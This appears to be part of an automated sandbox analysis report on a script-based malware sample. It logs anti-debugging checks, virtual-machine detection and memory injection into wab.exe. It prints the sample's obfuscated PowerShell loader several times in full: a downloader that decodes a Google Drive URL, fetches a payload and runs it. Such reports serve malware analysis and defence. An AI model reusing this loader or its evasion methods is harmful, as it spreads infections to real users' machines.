            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97202Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97088Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96962Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96842Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96732Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96624Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96512Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96406Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96296Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96172Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96062Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95834Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95718Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95604Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95489Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95374Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95265Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95142Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94902Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000000.00000002.2079442238.000001EA79156000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000000.00000003.2068606801.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2070156115.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076473394.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069510117.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079541397.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069833388.000001EA791E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.2069751324.000001EA79433000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076795867.000001EA79458000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076362482.000001EA7943B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076183249.000001EA79411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079981179.000001EA7945A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076291584.000001EA7941F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`'
            Source: wscript.exe, 00000000.00000003.2068606801.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2070156115.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076473394.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069510117.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079541397.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069833388.000001EA791E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
            Source: powershell.exe, 00000002.00000002.2924619147.00000243C0710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllph3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_00A570B8 CheckRemoteDebuggerPresent, 10_2_00A570B8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_04DCDAAC LdrInitializeThunk, 5_2_04DCDAAC
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 12_2_00382A7E GetProcessHeap, HeapAlloc, memcpy, GetProcessHeap, HeapFree, 12_2_00382A7E
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 12_2_00383450 SetUnhandledExceptionFilter, 12_2_00383450
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe | Code function: 12_2_003832C0 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, 12_2_003832C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: A5FA34
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. 
Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Merogastrula.Bes && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. 
swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. 
swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivael
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. 
swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivaelJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$enchodontoid = 1;$multinervate='substrin';$multinervate+='g';function pisseskn($parate){$nongelatinizing=$parate.length-$enchodontoid;for($agrestical=5; $agrestical -lt $nongelatinizing; $agrestical+=(6)){$dextranase88+=$parate.$multinervate.invoke($agrestical, $enchodontoid);}$dextranase88;}function saprophagan($factories){. ($laurikke) ($factories);}$hovedvrker=pisseskn 'addlems,steo .andzconfoi vejrl reavlprintab.une/ca,ro5.icit.choos0skide lnnin(duellw desiimonopnwap.kdsavanoislanwdoercs emer bromnuovertaxopo opri.1allia0forel.vaing0 comb;angre decorwgraeni femin g.in6kursu4ect,c;ko tr parenxtyede6tri,h4taffe;phary elle,r,uresv kipe:,eseg1hjemm2hjlpe1klogt. igne0prd k) hove altergdis aejonnhcstrafkf,rudopseud/ st,w2r vhu0digi.1,ecir0fersk0nakke1k.ass0 mese1 ield osphrfklon.ifemaarklebiebrontf s.tyoamtsrxborte/ fron1excla2butto1 publ.svesk0handl ';$nuanceret=pisseskn ' sdelurepansmedhoehe.lirpar a-el,vaaukasegpoca,emagtkn divvtiodat ';$unshady=pisseskn 'xylo.h rabbthalfhtmika,pt,lles ayyu: un,o/ inka/d.kkedbo edrdicari beravpl,caeco.pa.dem bg husnovelbeobann,ganno,ltandsedegne. 
swinc fel,orebanmdemou/endkkudieumcad oc?dag oes,rtlx sadapbhaktonond r udtrtg imr=tobacddefraocl.ngwvkke nweakalfulfioplatoafo.stdstorb&klbesipessudbatte=stv r1oneratsperme,elveimesmen re.tjskoleufidg.nstopne ,rstahimmeiabiol- talescontrrbes.iibarbo4 undec emibsuppl4freed0 dagdutartr9aeropk.elefrudsy,lexecu2travexcoemp7antirxhypoej mbeld,imelg reeng.orsc ';$dousers=pisseskn 't llb>reimm ';$laurikke=pisseskn 'afpluigrligedemorxluckf ';$flyvestolene = pisseskn ' unwoekil.bcvibrihopsplo.ibbe mic,o%daiquaheroepgoldepud,krdsteelatum.dtoustia a,ch%brsli\ porcm shifesinopr tykeomythogskorsaskat sgastrt trihrintrau pu.sl.iuntacentr.digamb autoegrammshouse pid.l&grumo&und p delfe sst.cp,rtuhpigmeofrt s toppl$objec ';saprophagan (pisseskn ' punk$ di ogsa valslagbo s bubunscaa fluelmisl.:ombytal.mbasquee sidioteulempv jouretimbrrnaadia.usiktnong.iorgannindbrg onti=u,ear(f attcvelsemstevedne hu eks m/omskrcletfr ota$ ventfkern.lsciopy .igtv relees,less snakt tradou.bell fireecoelontot.ee malt)afspn ');saprophagan (pisseskn 'junke$ nsig appalunderoepipabisraea lit.lpresu:paritfgavend syfirgra.ue vendnnonpreresidh chanjhardme bedrm stil= chil$ armu sponnpa.klsbagflh.edbia epowdbe,tsy.icla.daa,esnringpunexploperci scat.ornb( drud$ apoldgiftioobjekudenatst,efoephr.tr unoxsindkr)vel.o ');$unshady=$fdrenehjem[0];saprophagan (pisseskn 'nupti$de,meg .krol takkoal.opb spe.agelatlvarpn:sprrebunfelaefteraskoledpetrorunderuundlitwor heskakbnmicro=cilion tracenonf,wu hen-tradio salibinscrja tikeu insc headtresta .gtessblo,kyudlndsnonsutfjor.e.aukam radi.,ystenilluvekupeettinkr.statiwhjlpeesnarebp.radcur allhangoihexace,phemn c litpensi ');saprophagan (pisseskn 'philo$triumb bun a unp.asubagdfo,kerdah iu.ridntsengeeskruensched. b.rghanchye duraarangsdprivaelJump to behavior
